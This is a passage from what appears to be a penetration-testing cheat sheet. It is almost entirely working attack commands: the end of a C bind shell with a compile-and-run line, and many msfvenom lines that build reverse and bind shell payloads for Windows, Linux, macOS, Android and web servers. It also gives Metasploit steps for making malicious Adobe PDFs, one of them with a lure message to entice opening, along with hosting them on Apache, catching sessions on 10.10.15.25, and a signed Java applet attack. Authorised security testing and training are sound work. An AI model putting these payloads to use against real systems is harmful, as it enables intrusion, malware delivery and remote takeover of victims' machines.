execl(SHELL, NULL, NULL); return 0; } else close(new_sockfd); } } return 0; }
# Compile Above Code gcc /tmp/bindshell.c --output csh && csh
# Staged: Sent in two stages, the first one it loads a dropper, and the second stage loads the payload msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe msfvenom -p windows/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe # Stageless: Standalone payloads is sent at once to the target using less communication msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe msfvenom -p windows/meterpreter/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > meterpreter.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > meterpreter.exe # Windows Bind Shell msfvenom -p windows/meterpreter/bind_tcp lhost=127.0.0.1 lport=4444 -f exe -o reverse.exe
# Staged: Sent in two stages, the first one it loads a dropper, and the second stage loads the payload msfvenom -p linux/x86/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf >rev.elf msfvenom -p linux/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf # Stageless: Standalone payloads is sent at once to the target using less communication msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf msfvenom -p linux/x86/meterpreter/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf msfvenom -p linux/x64/meterpreter/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
# ASP msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f asp > shell.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f asp > shell.asp # JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > shell.jsp # WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f war > shell.war # PHP msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php msfvenom -p php/meterpreter/reverse_php LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php # HTTPS Shell msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=4444 -f exe > ~/Documents/payloads/443.exe
# Msfvenom example on how to exploit a PDF vulnerability in Adobe sudo msfdbinit # Initializes Metasploit database if you have not run before sudo msfconsole # Opens Metasploit # Metasploit Commands use exploit/windows/fileformat/adobe_utilprintf show options set FILENAME msf.pdf set TARGET 0 exploit (this simply creates a malicous pdf file. hosting it for delivery and setting up a payload handler still needs to be done to use) # Terminal Commands cp /root/.msf4/local/msf.pdf /var/www (this copies the malicious pdf to the web server) systemctl start apache2 || systemctl start httpd (this starts the web server) # Metasploit Start Listening Handler use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.15.25 show advanced set ExitOnSession false (allows for multiple sessions to be caught for use) run -j (this runs the handler as a job in the background to keep an open meterpreter session) -------------------------------------- # Embed an Executable Inside Adobe PDF # Metasploit Commands use exploit/windows/fileformat/adobe_pdf_embedded_exe show options set EXENAME # (prebulit executables can be selected here) set INFILENAME /usr/share/set/readme/User_Manual.pdf # (selects the PDF to insert executable into) set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.15.25 set LAUNCH_MESSAGE # (sets the message the user will be shown to entice opening) SET UP A HANDLER FOR THE PAYLOAD cp /root/.msf4/local/msf.pdf /var/www systemctl start apache2 || systemctl start httpd use multi/handler run
# Python msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=4444 -f raw > shell.py # Bash msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=4444 -f raw > shell.sh # Perl msfvenom -p cmd/unix/reverse_perl LHOST=127.0.0.1 LPORT=4444 -f raw > shell.pl # PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
# OpenBSD/MacOS msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f macho > shell.macho
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 > ~/Documents/payloads/file.apk
# JAVA APPLET EXPLOIT # Bypass the need for unpatched java vulnerability by asking the user to run it sudo msfdbinit # Initializes Metasploit database if you have not run before sudo msfconsole # Opens Metasploit # Metasploit Commands use exploit/multi/browser/java_signed_applet show options set APPLETNAME javaapplet set SRVHOST 127.0.0.1 set SRVPORT 80 (if this is run java will show the signer is unknown unless the signer uses a trusted signing certificate. This option can be set using set SigningCert) show targets set target 0 set payload java/meterpreter/reverse_tcp set LHOST 127.0.0.1 run